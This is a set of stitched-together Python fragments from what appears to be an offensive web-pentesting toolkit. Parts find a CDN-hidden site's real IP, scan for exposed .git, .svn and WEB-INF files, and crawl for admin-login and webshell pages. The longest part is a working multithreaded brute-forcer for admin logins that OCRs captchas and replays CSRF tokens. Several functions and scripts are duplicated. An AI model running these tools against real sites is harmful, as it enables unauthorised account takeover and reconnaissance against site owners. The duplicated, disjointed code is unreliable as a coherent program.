def __init__(self, domain):
    """Prepare real-IP detection for *domain* (a domain hidden behind a CDN).

    Requires a working VPN — i.e. google must be pingable — because some
    domains are blocked by the GFW and would otherwise be unreachable,
    which would make this tool misjudge.  checkvpn() returns 1 when
    google can be pinged.
    """
    # Block until the VPN is confirmed up.
    while 1:
        if checkvpn() == 1:
            break
        else:
            time.sleep(1)
            print("vpn is off,connect vpn first")
    # The domain must be bare (www.baidu.com), not a URL with a scheme.
    if domain[:4] == "http":
        print(
            "domain format error,make sure domain has no http,like www.baidu.com but not \
http://www.baidu.com")
        # FIX: was sys.exit(0) — an input error should exit non-zero.
        sys.exit(1)
    # First make sure /etc/hosts holds no entry related to this domain;
    # delete any that exist.  (Raw strings fix the invalid "\." / "\s"
    # escape sequences of the original.)
    domainPattern = domain.replace(".", r"\.")
    # The sed regex must not contain \n — matching \n in sed is special, see
    # http://stackoverflow.com/questions/1251999/how-can-i-replace-a-newline-n-using-sed
    command = r"sudo sed -ri 's/.*\s+%s//' /etc/hosts" % domainPattern
    os.system(command)
    self.domain = domain
    self.http_or_https = get_http_or_https(self.domain)
    print('domain的http或https是:%s' % self.http_or_https)
    result = get_request(self.http_or_https + "://" + self.domain,
                         'seleniumPhantomJS')
    # Baseline page title; candidate IPs are later compared against it.
    self.domain_title = result['title']
    # get_actual_ip_from_domain acts as this class's "main" routine.
    actual_ip = self.get_actual_ip_from_domain()
    if actual_ip != 0:
        print("恭喜,%s的真实ip是%s" % (self.domain, actual_ip))
    # Key return value for callers.
    self.return_value = actual_ip
def get_domain_actual_ip_from_phpinfo(self):
    """Try to recover the domain's real IP from a leftover phpinfo page.

    Probes a few common phpinfo file names; on a 200 response whose body
    exposes REMOTE_ADDR, extracts the dotted-quad value next to it.

    Returns:
        The IP address string on success, or 0 when no phpinfo page
        leaks the real IP.
    """
    CLIOutput().good_print("现在尝试从domain:%s可能存在的phpinfo页面获取真实ip" % self.domain)
    phpinfo_page_list = ["info.php", "phpinfo.php", "test.php", "l.php"]
    for each in phpinfo_page_list:
        url = self.http_or_https + "://" + self.domain + "/" + each
        CLIOutput().good_print("现在访问%s" % url)
        visit = get_request(url, 'seleniumPhantomJS')
        code = visit['code']
        content = visit['content']
        if code != 200:
            continue
        # FIX: the original pre-checked "remote_addr" with re.I but then
        # re-searched case-sensitively without a guard, so a page with a
        # lowercase-only "remote_addr" raised AttributeError on .group(1).
        # One case-insensitive search with a None-guard covers both.
        match = re.search(
            r"REMOTE_ADDR[^\.\d]+([\d\.]{7,15})[^\.\d]+", content, re.I)
        if match:
            return match.group(1)
    # 0 means: the real IP could not be obtained via phpinfo pages.
    return 0
def check_if_ip_is_actual_ip_of_domain(self, ip):
    """Check via /etc/hosts pinning whether *ip* really serves self.domain.

    Backs up /etc/hosts, pins domain -> ip, refetches the page, restores
    the hosts file, then compares page titles.

    Returns:
        True when the pinned fetch yields the baseline title, else False.
    """
    # Requests made through the requests / mechanicalsoup /
    # selenium-phantomjs libraries are not affected by the OS DNS cache,
    # only by /etc/hosts; a human browser visit WOULD hit the DNS cache.
    CLIOutput().good_print("现在通过修改hosts文件的方法检测ip:%s是否是domain:%s的真实ip" % (ip, self.domain))
    os.system("cp /etc/hosts /etc/hosts.bak")
    self.modify_hosts_file_with_ip_and_domain(ip)
    # FIX: the "by" argument was 'selenium_phantom_js', which does not
    # match the 'seleniumPhantomJS' spelling used by every other
    # get_request call in this file.
    hosts_changed_domain_title = get_request(
        self.http_or_https + "://%s" % self.domain,
        'seleniumPhantomJS')['title']
    os.system("rm /etc/hosts && mv /etc/hosts.bak /etc/hosts")
    # Compare titles, not full HTML: identical titles count as identical.
    if self.domain_title == hosts_changed_domain_title:
        CLIOutput().good_print("检测到真实ip!!!!!!", 'red')
        return True
    else:
        CLIOutput().good_print("当前ip不是域名的真实ip", 'yellow')
        return False
def get_form_data_post_info(url, cookie):
    """Collect multipart/form-data upload info from the page at *url*.

    Returns a dict with:
      - 'form_data_dict': non-file parameters of the multipart form
      - 'form_file_param_name': the name of the file parameter
      - 'origin_html': the page HTML with HTML comments stripped
    Exits the process when the page has no file input or no form element.
    """
    form_data_dict = {}
    form_file_param_name = ''
    return_value = {'form_data_dict': form_data_dict,
                    'form_file_param_name': form_file_param_name,
                    'origin_html': ''}
    rsp = get_request(url, cookie=cookie)
    origin_html = rsp['content']
    # Strip HTML comments so commented-out inputs are not matched below.
    origin_html = re.sub(r"<!--.*-->", "", origin_html)
    has_file = re.search(
        r'''<input .*type=('|")?file('|")?.*>''', origin_html, re.I)
    has_form = re.search(r"<form\s+", origin_html, re.I)
    if not has_file:
        print("Sorry,I can't find any `file` element,the url has no upload function.If you are sure it has an upload function, you can continue to test by supplying the `-r` parameter")
        sys.exit(0)
    elif not has_form:
        print("Sorry,I can't find any `form` element,but find a `file` element,you need to provide the `-r` parameter to specify a file whose contents are upload request packet")
        sys.exit(0)
    # NOTE: a second, unreachable re-check of <form> was removed here —
    # the `elif not has_form` branch above already handles that case.
    param_part = get_param_part_from_content(origin_html)
    for param_and_value in param_part.split("&"):
        pieces = param_and_value.split("=")
        if len(pieces) < 2:
            # Robustness: skip malformed fragments without '=' instead of
            # raising IndexError.
            continue
        param = pieces[0]
        value = pieces[1]
        if value != "filevalue":
            # Non-file form parameter.
            form_data_dict[param] = value
        else:
            # The file-upload parameter.
            form_file_param_name = param
    return_value['form_data_dict'] = form_data_dict
    return_value['form_file_param_name'] = form_file_param_name
    return_value['origin_html'] = origin_html
    return return_value
def check_if_ip_is_actual_ip_of_domain(self, ip):
    """Decide whether *ip* is the real address behind self.domain.

    Backs up /etc/hosts, pins the domain to *ip*, flushes DNS, refetches
    the page, restores the hosts file, and compares page titles with the
    baseline captured at construction time.
    """
    CLIOutput().good_print(
        "现在通过修改hosts文件并刷新dns的方法检测ip:%s是否是domain:%s的真实ip" % (ip, self.domain))
    os.system("cp /etc/hosts /etc/hosts.bak")
    self.modify_hosts_file_with_ip_and_domain(ip)
    self.flush_dns()
    pinned_url = self.http_or_https + "://%s" % self.domain
    pinned_title = get_request(pinned_url, 'seleniumPhantomJS')['title']
    os.system("rm /etc/hosts && mv /etc/hosts.bak /etc/hosts")
    # Titles (not full HTML) are compared: equal titles mean same site.
    is_real_ip = self.domain_title == pinned_title
    if is_real_ip:
        print("是的!!!!!!!!!!!!")
    else:
        print("不是的!!!!!!!!!!!!")
    return is_real_ip
def parse_get(self, response):
    """Scrapy/Splash callback for GET responses.

    Builds a CrawlerItem for the fetched page, flags pages that look like
    admin-login or webshell pages, records newly seen sub-domains, and
    schedules follow-up SplashRequests for newly discovered URLs.

    Yields:
        One CrawlerItem for this page, then SplashRequest objects for
        each follow-up URL.
    """
    item = CrawlerItem()
    item['code'] = response.status
    item['current_url'] = response.url
    item['resources_file_list'] = []
    item['sub_domains_list'] = []
    item['like_admin_login_url'] = False
    item['like_webshell_url'] = False
    if response.status == 200:
        urls = collect_urls_from_html(response.text, response.url)
        title_list = response.xpath('//title/text()').extract()
        item['title'] = None if len(title_list) == 0 else title_list[0]
        item['content'] = response.text
    else:
        # Non-200: refetch through get_request to still obtain a usable
        # title/content pair for the item.
        a = get_request(response.url, cookie=self.cookie)
        item['title'] = a['title']
        item['content'] = a['content']
        urls = collect_urls_from_html(a['content'], response.url)
    # FIX: these two flag lines used '==' (a no-op comparison whose result
    # was discarded) instead of '=', so the flags were never actually set.
    if like_admin_login_content(item['content']):
        item['like_admin_login_url'] = True
    if check_url_has_webshell_content(item['current_url'], item['content'],
                                      item['code'], item['title'])['y1']:
        item['like_webshell_url'] = True
    yield item
    url_main_target_domain = get_url_belong_main_target_domain(
        self.start_url)
    for url in urls:
        url_templet_list = get_url_templet_list(url)
        url_http_domain = get_http_domain_from_url(url)
        # Record previously unseen sub-domains of the main target.
        if url_is_sub_domain_to_http_domain(
                url, urlparse(url)[0] + "://" + url_main_target_domain
        ) and url_http_domain not in item['sub_domains_list']:
            item['sub_domains_list'].append(url_http_domain)
        if urlparse(url).hostname != self.domain:
            continue
        if url in self.collected_urls:
            continue
        # Skip URLs whose templet (parameterized pattern) was already
        # crawled — avoids re-crawling equivalent URLs.
        _flag = 0
        for _ in url_templet_list:
            if _ in self.collected_urls:
                _flag = 1
                break
        if _flag == 1:
            continue
        self.add_url_templet_to_collected_urls(url)
        if "^" in url:
            # POST-style url, encoded as "action_url^post_data".
            post_url_list = url.split("^")
            post_url = post_url_list[0]
            post_data = post_url_list[1]
            yield SplashRequest(post_url,
                                callback=self.parse_post,
                                endpoint='execute',
                                magic_response=True,
                                meta={
                                    'handle_httpstatus_all': True,
                                    'current_url': url
                                },
                                args={
                                    'lua_source': self.lua_script,
                                    'http_method': 'POST',
                                    'body': post_data
                                })
        else:
            # GET-style url.
            match_resource = re.match(RESOURCE_FILE_PATTERN, url)
            match_logoff = re.search(
                r"(logout)|(logoff)|(exit)|(signout)|(signoff)", url, re.I)
            if match_resource:
                item['resources_file_list'].append(url)
            elif match_logoff:
                # Never follow logout-like links: they would end the session.
                pass
            else:
                yield SplashRequest(url,
                                    self.parse_get,
                                    endpoint='execute',
                                    magic_response=True,
                                    meta={'handle_httpstatus_all': True},
                                    args={'lua_source': self.lua_script})
import re
import os
import sys

# Make the locally vendored exp10it module importable.
exp10it_module_path = os.path.expanduser("~") + "/mypypi"
sys.path.insert(0, exp10it_module_path)
from exp10it import get_request
from exp10it import get_http_domain_from_url

# Probe the target (sys.argv[1]) for source-code / VCS metadata leaks
# (.git, .svn, WEB-INF files, ...) and append findings to result.txt.
target = sys.argv[1]
print("checking code leak vul for " + target)
current_dir = os.path.split(os.path.realpath(__file__))[0]
return_string = ""
leak_list = [
    ".hg",
    ".git",
    ".svn",
    ".ds_store",
    ".bzr",
    # FIX: was "WEB-INF/database.propertiesl" (trailing 'l' typo), which
    # could never match the real WEB-INF config file.
    "WEB-INF/database.properties",
    "WEB-INF/web.xml",
]
# Hoisted out of the loop: the http domain does not depend on `each`.
http_domain = get_http_domain_from_url(target)
for each in leak_list:
    leaked_url = http_domain + "/" + each
    a = get_request(leaked_url)
    # A 200 response that is not a "页面不存在" soft-404 counts as a leak.
    if not re.search(r"页面不存在", a['content'], re.I) and a['code'] == 200:
        return_string += "%s exists!\n" % leaked_url
if return_string != "":
    return_string += "visit http://www.hacksec.cn/Penetration-test/474.html to exploit it"
    with open("%s/result.txt" % current_dir, "a+") as f:
        f.write(return_string)
import re
import os
import sys

# Make the locally vendored exp10it module importable.
# FIX: a second, duplicate `import sys` after this block was removed.
exp10it_module_path = os.path.expanduser("~") + "/mypypi"
sys.path.insert(0, exp10it_module_path)
from exp10it import get_request
from exp10it import get_http_domain_from_url

# Probe the target (sys.argv[1]) for source-code / VCS metadata leaks
# (.git, .svn, WEB-INF files, ...) and append findings to result.txt.
target = sys.argv[1]
print("checking code leak vul for " + target)
current_dir = os.path.split(os.path.realpath(__file__))[0]
return_string = ""
# Locals renamed to snake_case for consistency with the sibling script.
leak_list = [
    ".hg",
    ".git",
    ".svn",
    ".ds_store",
    ".bzr",
    # FIX: was "WEB-INF/database.propertiesl" (trailing 'l' typo), which
    # could never match the real WEB-INF config file.
    "WEB-INF/database.properties",
    "WEB-INF/web.xml",
]
# Hoisted out of the loop: the http domain does not depend on `each`.
http_domain = get_http_domain_from_url(target)
for each in leak_list:
    leaked_url = http_domain + "/" + each
    a = get_request(leaked_url)
    # A 200 response that is not a "页面不存在" soft-404 counts as a leak.
    if not re.search(r"页面不存在", a['content'], re.I) and a['code'] == 200:
        return_string += "%s exists!\n" % leaked_url
if return_string != "":
    return_string += "visit http://www.hacksec.cn/Penetration-test/474.html to exploit it"
    with open("%s/result.txt" % current_dir, "a+") as f:
        f.write(return_string)
def crack_admin_login_url(
        url,
        user_dict_file=ModulePath + "dicts/user.txt",
        pass_dict_file=ModulePath + "dicts/pass.txt",
        yanzhengma_len=0):
    # Brute-force an admin backend login url, trying to auto-recognize the
    # captcha ("yanzhengma").  If the login page has no captcha, sending
    # arbitrary captcha data still passes validation.
    # yanzhengma_len is the required captcha length; 0 (the default) means
    # auto-detect.  Setting it manually per target usually works better.
    #
    # Shared mutable state between the nested closures is held in
    # single-element lists (get_flag, try_time, sum, start, ...) so the
    # worker threads can rebind element 0 without `nonlocal`.
    # Returns the success summary string, or "" when nothing was cracked.
    import requests
    figlet2file("cracking admin login url", 0, True)
    print("cracking admin login url:%s" % url)
    print("正在使用吃奶的劲爆破登录页面...")

    def crack_admin_login_url_thread(url, username, password):
        # Worker: try one (username, password) pair against the login form.
        if get_flag[0] == 1:
            # Another thread already cracked the login; stop early.
            return
        try_time[0] += 1
        if requestAction == "GET":
            # GET login: substitute user/pass (and captcha / CSRF token)
            # directly into the query string of the form action url.
            final_request_url = form_action_url
            final_request_url = re.sub(
                r"%s=[^&]*" % user_form_name,
                "%s=%s" % (user_form_name, username), final_request_url)
            final_request_url = re.sub(
                r"%s=[^&]*" % pass_form_name,
                "%s=%s" % (pass_form_name, password), final_request_url)
            if has_yanzhengma[0]:
                if needOnlyGetOneYanZhengMa:
                    yanzhengmaValue = onlyOneYanZhengMaValue
                else:
                    yanzhengmaValue = get_one_valid_yangzhengma_from_src(
                        yanzhengma_src)
                final_request_url = re.sub(
                    r"%s=[^&]*" % yanzhengma_form_name,
                    "%s=%s" % (yanzhengma_form_name, yanzhengmaValue),
                    final_request_url)
            if hasCsrfToken:
                final_request_url = re.sub(
                    r"%s=[^&]*" % csrfTokenName,
                    currentCsrfTokenPart[0], final_request_url)
            html = s.get(final_request_url).text
            if hasCsrfToken:
                # Refresh the CSRF token from the response for the next try.
                csrfTokenValue = get_csrf_token_value_from_html(html)
                currentCsrfTokenPart[0] = csrfTokenPart + csrfTokenValue
        else:
            # POST request: form_action_url is "action^param1=v1&param2=v2".
            paramPartValue = form_action_url.split("^")[1]
            paramList = paramPartValue.split("&")
            values = {}
            for eachP in paramList:
                eachPList = eachP.split("=")
                eachparamName = eachPList[0]
                eachparamValue = eachPList[1]
                if eachparamName == user_form_name:
                    eachparamValue = username
                if eachparamName == pass_form_name:
                    eachparamValue = password
                values[eachparamName] = eachparamValue
            if has_yanzhengma[0]:
                if not needOnlyGetOneYanZhengMa:
                    values[yanzhengma_form_name] = \
                        get_one_valid_yangzhengma_from_src(yanzhengma_src)
                else:
                    values[yanzhengma_form_name] = onlyOneYanZhengMaValue
            if hasCsrfToken:
                values[csrfTokenName] = re.search(
                    r"[^=]+=(.*)", currentCsrfTokenPart[0]).group(1)
            html = s.post(form_action_url.split("^")[0], values).text
            if hasCsrfToken:
                # Refresh the CSRF token from the response for the next try.
                csrfTokenValue = get_csrf_token_value_from_html(html)
                currentCsrfTokenPart[0] = csrfTokenPart + csrfTokenValue
        USERNAME_PASSWORD = "******" + username + ":" + \
            password + ")" + (52 - len(password)) * " "
        # Recompute the average speed / remaining time every 100 attempts.
        left_time = get_remain_time(
            start[0], biaoji_time[0], remain_time[0], 100, try_time[0],
            sum[0])
        remain_time[0] = left_time
        # Single-line progress bar, rewritten in place via '\r'.
        sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' +
                         str(try_time[0] * 100 // sum[0]) + '%' +
                         ' %s/%s remain time:%s %s\r' %
                         (try_time[0], sum[0], remain_time[0],
                          USERNAME_PASSWORD))
        sys.stdout.flush()
        if len(html) > logined_least_length:
            # Response grew past the threshold: treat this as a login success.
            get_flag[0] = 1
            end = time.time()
            CLIOutput().good_print(
                "congratulations!!! admin login url cracked succeed!!!",
                "red")
            string = "cracked admin login url:%s username and password:(%s:%s)" % (
                url, username, password)
            CLIOutput().good_print(string, "red")
            return_string[0] = string
            print("you spend time:" + str(end - start[0]))
            http_domain_value = get_http_domain_from_url(url)
            # Verified: terminate() would only end the current thread, it
            # cannot end all threads — hence the get_flag[0] signal above.
            # NOTE(review): the two values below are computed but never
            # used afterwards — confirm before relying on them.
            table_name_list = get_target_table_name_list(http_domain_value)
            urls_table_name = http_domain_value.split(
                "/")[-1].replace(".", "_") + "_urls"
            return {'username': username, 'password': password}

    def crack_admin_login_url_inside_func(url, username, pass_dict_file):
        # Fan out one username against every password in pass_dict_file.
        # urls and usernames are same-length lists repeating the same value,
        # so they can be zipped with passwords by executor.map.
        urls = []
        usernames = []
        # passwords is the list of all passwords read from pass_dict_file.
        passwords = []
        i = 0
        # Re-prompt until an existing password dict file is supplied.
        while 1:
            if os.path.exists(pass_dict_file) is False:
                print("please input your password dict:>", end=' ')
                pass_dict_file = input()
                if os.path.exists(pass_dict_file) is True:
                    break
            else:
                break
        f = open(pass_dict_file, "r+")
        for each in f:
            urls.append(url)
            usernames.append(username)
            each = re.sub(r"(\s)$", "", each)
            passwords.append(each)
            i += 1
        f.close()
        # Total attempts = users x passwords (for the progress display).
        sum[0] = usernames_num * i
        # Captcha-per-request and CSRF flows are stateful in the session,
        # so they must run single-threaded.
        if needOnlyGetOneYanZhengMa or hasCsrfToken:
            max_workers = 1
        else:
            max_workers = 20
        with futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
            executor.map(crack_admin_login_url_thread, urls, usernames,
                         passwords)

    def get_one_valid_yangzhengma_from_src(yanzhengmaUrl):
        # Fetch the captcha image through the shared session `s` (NOT via
        # the packaged get_request/post_request helpers) because the
        # server-side session cookie must be preserved, then OCR it.
        # Loops until the OCR result looks plausible (alnum only, no
        # whitespace, non-empty, and matching yanzhengma_len when set).
        while 1:
            import shutil
            response = s.get(yanzhengmaUrl, stream=True)
            with open('img.png', 'wb') as out_file:
                shutil.copyfileobj(response.raw, out_file)
            del response
            yanzhengma = get_string_from_url_or_picfile("img.png")
            os.system("rm img.png")
            time.sleep(3)
            if re.search(r"[^a-zA-Z0-9]+", yanzhengma):
                continue
            elif re.search(r"\s", yanzhengma):
                continue
            elif yanzhengma == "":
                continue
            else:
                if yanzhengma_len != 0:
                    if len(yanzhengma) != yanzhengma_len:
                        continue
                break
        return yanzhengma

    # ---- main body: inspect the login form ----
    a = get_request(url, by="seleniumPhantomJS")
    get_result = get_user_and_pass_form_from_html(a['content'])
    user_form_name = get_result['user_form_name']
    pass_form_name = get_result['pass_form_name']
    if user_form_name is None:
        print("user_form_name is None")
        return
    if pass_form_name is None:
        print("pass_form_name is None")
        return
    form_action_url = a['formActionValue']
    # Default request action is POST; "^" in the action value marks the
    # POST encoding, its absence means a GET form.
    requestAction = "POST"
    if a['hasFormAction']:
        if "^" not in a['formActionValue']:
            requestAction = "GET"
    else:
        print("url is not a admin login url entry")
        return
    # Shared state for the worker threads (single-element-list "globals").
    get_flag = [0]
    return_string = [""]
    try_time = [0]
    sum = [0]
    start = [0]
    # "Function-global" marker for the current timestamp.
    biaoji_time = [0]
    # "Function-global" marker for the estimated remaining time.
    tmp = time.time()
    remain_time = [tmp - tmp]
    has_yanzhengma = [False]
    find_yanzhengma = get_yanzhengma_form_and_src_from_url(url)
    if find_yanzhengma:
        yanzhengma_form_name = find_yanzhengma['yanzhengma_form_name']
        yanzhengma_src = find_yanzhengma['yanzhengma_src']
        has_yanzhengma = [True]
    hasCsrfToken = False
    forCsrfToken = get_url_has_csrf_token(url)
    if forCsrfToken['hasCsrfToken']:
        hasCsrfToken = True
        csrfTokenName = forCsrfToken['csrfTokenName']
        csrfTokenPart = csrfTokenName + "="
    currentCsrfTokenPart = [""]
    s = requests.session()
    # Session start place: the first GET establishes cookies and gives the
    # not-logged-in page length used as the success threshold below.
    sessionStart = s.get(url)
    unlogin_length = len(sessionStart.text)
    # If a response is more than 1.5x the not-logged-in length, the login
    # attempt is considered successful.
    logined_least_length = unlogin_length + unlogin_length / 2
    if hasCsrfToken:
        csrf_token_value = get_csrf_token_value_from_html(sessionStart.text)
        currentCsrfTokenPart = [csrfTokenPart + csrf_token_value]
    # When the captcha is served by a DIFFERENT host/path than the form
    # action, it is assumed to be validated only once per session, so one
    # manually-entered captcha value can be reused for every attempt.
    needOnlyGetOneYanZhengMa = False
    if has_yanzhengma[0]:
        if "^" in form_action_url:
            # post request
            print(get_value_from_url(form_action_url.split("^")[0])['y1'])
            if get_value_from_url(form_action_url.split("^")[0])['y1'] != \
                    get_value_from_url(a['currentUrl'])['y1']:
                # should update yanzhengma everytime
                needOnlyGetOneYanZhengMa = True
        else:
            # get request
            if get_value_from_url(form_action_url)['y1'] != \
                    get_value_from_url(a['currentUrl'])['y1']:
                needOnlyGetOneYanZhengMa = True
    if needOnlyGetOneYanZhengMa:
        print("Congratulation! Target login url need only one yanzhengma!!")
        import shutil
        response = s.get(yanzhengma_src, stream=True)
        with open('img.png', 'wb') as out_file:
            shutil.copyfileobj(response.raw, out_file)
        del response
        onlyOneYanZhengMaValue = input(
            "Please open img.png and input the yanzhengma string:>")
        os.system("rm img.png")
    with open(r"%s" % user_dict_file, "r+") as user_file:
        all_users = user_file.readlines()
    usernames_num = len(all_users)
    start[0] = time.time()
    for username in all_users:
        # A doubly-threaded version once failed to cover all combinations,
        # so no extra thread layer is opened here.
        username = re.sub(r'(\s)$', '', username)
        crack_admin_login_url_inside_func(a['currentUrl'], username,
                                          pass_dict_file)
    return return_string[0]